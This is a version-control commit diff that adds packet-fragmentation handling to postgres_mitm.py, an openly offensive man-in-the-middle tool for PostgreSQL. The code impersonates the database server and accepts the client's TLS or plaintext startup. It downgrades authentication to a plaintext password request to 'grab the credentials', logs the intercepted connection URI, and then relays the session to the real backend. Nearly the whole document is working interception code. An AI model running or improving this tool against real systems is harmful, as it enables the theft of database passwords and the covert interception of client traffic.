Handle packet fragmentation more robustly
Not the most effective, but it shouldn't fall over itself if faced
with fragmented packets.
Doesn't properly initiate plaintext connections yet, need some more
debugging to figure out what's up with that. Might be due to using
.read on a non-SSL socket.
Remaining items for robustness:
- Make sure .send sends the entire message (or does SSL sockets
handle that for us?)
- Handle potential fragmentation when establishing server
connection
This commit is contained in:
parent
878310d3e1
commit
f1094961ba
1 changed files with 102 additions and 55 deletions
149
postgres_mitm.py
149
postgres_mitm.py
|
|
@ -35,8 +35,8 @@ from collections import namedtuple
|
||||||
|
|
||||||
# Sent by client when requesting TLS connection (this is the magic version
|
# Sent by client when requesting TLS connection (this is the magic version
|
||||||
# 1234.5679 of the protocol, defined in pgcomm.h)
|
# 1234.5679 of the protocol, defined in pgcomm.h)
|
||||||
SSL_STARTUP_REQUEST = '\x00\x00\x00\x08\x04\xd2\x16\x2f'
|
|
||||||
SSL_STARTUP_RESPONSE = 'S'
|
SSL_STARTUP_RESPONSE = 'S'
|
||||||
|
VERSION_SSL = '\x04\xd2\x16\x2f'
|
||||||
VERSION_3 = '\x00\x03\x00\x00'
|
VERSION_3 = '\x00\x03\x00\x00'
|
||||||
|
|
||||||
_logger = logging.getLogger(__name__)
|
_logger = logging.getLogger(__name__)
|
||||||
|
|
@ -130,10 +130,11 @@ class ClientConnection(threading.Thread):
|
||||||
self.ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
|
self.ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
|
||||||
self.ssl_context.load_cert_chain(certfile='server.cert', keyfile='server.key')
|
self.ssl_context.load_cert_chain(certfile='server.cert', keyfile='server.key')
|
||||||
self.socket = client_socket
|
self.socket = client_socket
|
||||||
self.packet_handler = self.handle_startup_packet
|
|
||||||
self.target_backend = target_backend
|
self.target_backend = target_backend
|
||||||
self.server_socket = None
|
self.server_socket = None
|
||||||
self._stop = threading.Event()
|
self._stop = threading.Event()
|
||||||
|
self.unread_client_data = ''
|
||||||
|
self.buffer_size = 4096
|
||||||
|
|
||||||
|
|
||||||
def stop(self):
|
def stop(self):
|
||||||
|
|
@ -146,28 +147,9 @@ class ClientConnection(threading.Thread):
|
||||||
|
|
||||||
|
|
||||||
def run(self):
|
def run(self):
|
||||||
_logger.debug('Thread running')
|
self.initiate_client_and_server_connections()
|
||||||
# wait for startup packet
|
_logger.debug('Initiated')
|
||||||
buffer_size = 4096
|
|
||||||
data_sent = self.socket.recv(buffer_size)
|
|
||||||
if data_sent == SSL_STARTUP_REQUEST:
|
|
||||||
_logger.debug('Got SSL startup request')
|
|
||||||
|
|
||||||
self.socket.send(SSL_STARTUP_RESPONSE)
|
|
||||||
self.listen_for_tls_handshake()
|
|
||||||
|
|
||||||
data = self.socket.read()
|
|
||||||
try:
|
try:
|
||||||
while data and not self.stopped:
|
|
||||||
if not self.packet_handler(data):
|
|
||||||
break
|
|
||||||
if self.server_socket:
|
|
||||||
# Switch to select-based IO
|
|
||||||
break
|
|
||||||
data = self.socket.read()
|
|
||||||
else:
|
|
||||||
_logger.warning('No more data received')
|
|
||||||
raise Exception('No more data')
|
|
||||||
_logger.debug('Using select to wait for data')
|
_logger.debug('Using select to wait for data')
|
||||||
while not self.stopped:
|
while not self.stopped:
|
||||||
timeout = 0
|
timeout = 0
|
||||||
|
|
@ -197,6 +179,94 @@ class ClientConnection(threading.Thread):
|
||||||
self.terminate()
|
self.terminate()
|
||||||
|
|
||||||
|
|
||||||
|
def initiate_client_and_server_connections(self):
|
||||||
|
# wait for startup packet
|
||||||
|
first_client_packet = self.wait_for_client_ssl_or_startup_packet()
|
||||||
|
requested_protocol_version = first_client_packet[4:8]
|
||||||
|
|
||||||
|
if requested_protocol_version == VERSION_SSL:
|
||||||
|
_logger.debug('Got SSL startup request')
|
||||||
|
self.send_to_client(SSL_STARTUP_RESPONSE)
|
||||||
|
self.listen_for_tls_handshake()
|
||||||
|
startup_packet = self.wait_for_client_ssl_or_startup_packet()
|
||||||
|
self.handle_startup_packet(startup_packet)
|
||||||
|
elif requested_protocol_version == VERSION_3:
|
||||||
|
# Didn't request SSL, totally fine for us, just request plaintext
|
||||||
|
# auth and grab the credentials
|
||||||
|
_logger.debug('Initiating plaintext connection')
|
||||||
|
self.handle_startup_packet(first_client_packet)
|
||||||
|
else:
|
||||||
|
# Invalid first packet, abort the connection
|
||||||
|
self.terminate()
|
||||||
|
return
|
||||||
|
|
||||||
|
auth_request = self.wait_for_auth_request()
|
||||||
|
if not self.handle_authentication_request(auth_request):
|
||||||
|
raise Exception('Backend auth failed')
|
||||||
|
|
||||||
|
|
||||||
|
def wait_for_client_ssl_or_startup_packet(self):
|
||||||
|
# Either SSL request or startup is the first packet sent, both has the
|
||||||
|
# format <int32 length><int32 protocol>[<other>]
|
||||||
|
|
||||||
|
# Read first 8 bytes to get tag and length of packet
|
||||||
|
first_8_bytes = self.read_n_bytes_from_client(8)
|
||||||
|
|
||||||
|
# Startup messages and SSL requests start with length of message in
|
||||||
|
# the first four bytes
|
||||||
|
msg_length = struct.unpack('!I', first_8_bytes[:4])[0]
|
||||||
|
|
||||||
|
rest_of_message = self.read_n_bytes_from_client(msg_length - 8)
|
||||||
|
|
||||||
|
return first_8_bytes + rest_of_message
|
||||||
|
|
||||||
|
|
||||||
|
def wait_for_auth_request(self):
|
||||||
|
# Format of message is <char tag><int32 len><message>
|
||||||
|
first_5_bytes = self.read_n_bytes_from_client(5)
|
||||||
|
tag = first_5_bytes[0]
|
||||||
|
if tag != 'p':
|
||||||
|
raise Exception("Received non-auth request: %s" % tag)
|
||||||
|
|
||||||
|
# Bump length with 1 to offset for tag
|
||||||
|
msg_length = struct.unpack('!I', first_5_bytes[1:])[0] + 1
|
||||||
|
_logger.debug('Reading auth request, waiting for %d bytes' % msg_length)
|
||||||
|
|
||||||
|
rest_of_message = self.read_n_bytes_from_client(msg_length - 5)
|
||||||
|
return first_5_bytes + rest_of_message
|
||||||
|
|
||||||
|
|
||||||
|
def read_n_bytes_from_client(self, n):
|
||||||
|
chunks = []
|
||||||
|
bytes_read = 0
|
||||||
|
|
||||||
|
if self.unread_client_data:
|
||||||
|
bytes_read += len(self.unread_client_data)
|
||||||
|
_logger.debug('Already had %d bytes from client', bytes_read)
|
||||||
|
chunks.append(self.unread_client_data)
|
||||||
|
self.unread_client_data = ''
|
||||||
|
|
||||||
|
while bytes_read < n:
|
||||||
|
chunk = self.socket.recv(self.buffer_size)
|
||||||
|
if not chunk:
|
||||||
|
raise Exception('Not enough data read')
|
||||||
|
chunks.append(chunk)
|
||||||
|
bytes_read += len(chunk)
|
||||||
|
|
||||||
|
received_so_far = ''.join(chunks)
|
||||||
|
self.unread_client_data = received_so_far[n:]
|
||||||
|
return received_so_far[:n]
|
||||||
|
|
||||||
|
|
||||||
|
def send_to_client(self, msg):
|
||||||
|
bytes_sent = 0
|
||||||
|
while bytes_sent < len(msg):
|
||||||
|
sent = self.socket.send(msg[bytes_sent:])
|
||||||
|
if sent == 0:
|
||||||
|
raise Exception('Client socket closed')
|
||||||
|
bytes_sent += sent
|
||||||
|
|
||||||
|
|
||||||
def handle_startup_packet(self, data):
|
def handle_startup_packet(self, data):
|
||||||
self.startup_packet = data
|
self.startup_packet = data
|
||||||
self.options = parse_options_from_startup_packet(data)
|
self.options = parse_options_from_startup_packet(data)
|
||||||
|
|
@ -207,7 +277,6 @@ class ClientConnection(threading.Thread):
|
||||||
}
|
}
|
||||||
_logger.debug('Replying to startup: %s' % repr(auth_reply))
|
_logger.debug('Replying to startup: %s' % repr(auth_reply))
|
||||||
self.socket.send(auth_reply)
|
self.socket.send(auth_reply)
|
||||||
self.packet_handler = self.handle_authentication_request
|
|
||||||
return True
|
return True
|
||||||
|
|
||||||
|
|
||||||
|
|
@ -228,7 +297,6 @@ class ClientConnection(threading.Thread):
|
||||||
}
|
}
|
||||||
_logger.info('Success! Intercepted auth: %s' % captured_uri)
|
_logger.info('Success! Intercepted auth: %s' % captured_uri)
|
||||||
self.socket.send(auth_success)
|
self.socket.send(auth_success)
|
||||||
self.packet_handler = self.handle_data
|
|
||||||
# Switch socket to non-blocking to enable messages to pass in
|
# Switch socket to non-blocking to enable messages to pass in
|
||||||
# arbitrary order
|
# arbitrary order
|
||||||
self.socket.setblocking(0)
|
self.socket.setblocking(0)
|
||||||
|
|
@ -239,7 +307,10 @@ class ClientConnection(threading.Thread):
|
||||||
|
|
||||||
def connect_to_actual_backend(self, password):
|
def connect_to_actual_backend(self, password):
|
||||||
sock = socket.create_connection((self.target_backend, 5432))
|
sock = socket.create_connection((self.target_backend, 5432))
|
||||||
sock.send(SSL_STARTUP_REQUEST)
|
sock.send('%(length)s%(version)s' % {
|
||||||
|
'length': struct.pack('!I', 8),
|
||||||
|
'version': VERSION_SSL,
|
||||||
|
})
|
||||||
buffer_size = 1024
|
buffer_size = 1024
|
||||||
data = sock.recv(buffer_size)
|
data = sock.recv(buffer_size)
|
||||||
assert data == 'S'
|
assert data == 'S'
|
||||||
|
|
@ -259,7 +330,6 @@ class ClientConnection(threading.Thread):
|
||||||
return False
|
return False
|
||||||
|
|
||||||
self.server_socket = sock
|
self.server_socket = sock
|
||||||
self.packet_handler = self.handle_data
|
|
||||||
|
|
||||||
# Receive auth response and forward to client
|
# Receive auth response and forward to client
|
||||||
data = self.server_socket.recv()
|
data = self.server_socket.recv()
|
||||||
|
|
@ -271,20 +341,6 @@ class ClientConnection(threading.Thread):
|
||||||
return True
|
return True
|
||||||
|
|
||||||
|
|
||||||
def handle_data(self, data):
|
|
||||||
_logger.debug('Handling client data: %s' % repr(data))
|
|
||||||
if data:
|
|
||||||
self.server_socket.send(data)
|
|
||||||
return True
|
|
||||||
|
|
||||||
|
|
||||||
def handle_server_data(self, data):
|
|
||||||
_logger.debug('Handling server data: %s' % repr(data))
|
|
||||||
if data:
|
|
||||||
self.socket.send(data)
|
|
||||||
return True
|
|
||||||
|
|
||||||
|
|
||||||
def listen_for_tls_handshake(self):
|
def listen_for_tls_handshake(self):
|
||||||
self.socket = self.ssl_context.wrap_socket(self.socket, server_side=True)
|
self.socket = self.ssl_context.wrap_socket(self.socket, server_side=True)
|
||||||
|
|
||||||
|
|
@ -320,12 +376,7 @@ def create_md5_auth_packet(username, password, salt):
|
||||||
|
|
||||||
|
|
||||||
def parse_options_from_startup_packet(data):
|
def parse_options_from_startup_packet(data):
|
||||||
assert len(data) >= 8
|
# format is <in32 length><in32 protocol>[<key>\0<value>\0]+\0
|
||||||
packet_length = struct.unpack('!I', data[0:4])[0]
|
|
||||||
raw_version = data[4:8]
|
|
||||||
assert raw_version == VERSION_3, 'Only version 3 of the psql protocol is supported'
|
|
||||||
|
|
||||||
# format is [<key>\0<value>\0]+\0
|
|
||||||
raw_key_value_pairs = data[8:]
|
raw_key_value_pairs = data[8:]
|
||||||
assert raw_key_value_pairs[-1] == '\0'
|
assert raw_key_value_pairs[-1] == '\0'
|
||||||
raw_key_value_pairs = raw_key_value_pairs[0:-1]
|
raw_key_value_pairs = raw_key_value_pairs[0:-1]
|
||||||
|
|
@ -342,10 +393,6 @@ def parse_options_from_startup_packet(data):
|
||||||
|
|
||||||
|
|
||||||
def parse_password_from_authentication_packet(data):
|
def parse_password_from_authentication_packet(data):
|
||||||
assert len(data) >= 6
|
|
||||||
assert data[0] == 'p'
|
|
||||||
raw_length = data[1:5]
|
|
||||||
length = struct.unpack('!I', raw_length)
|
|
||||||
assert data[-1] == '\0'
|
assert data[-1] == '\0'
|
||||||
return data[5:-1]
|
return data[5:-1]
|
||||||
|
|
||||||
|
|
|
||||||
Loading…
Add table
Reference in a new issue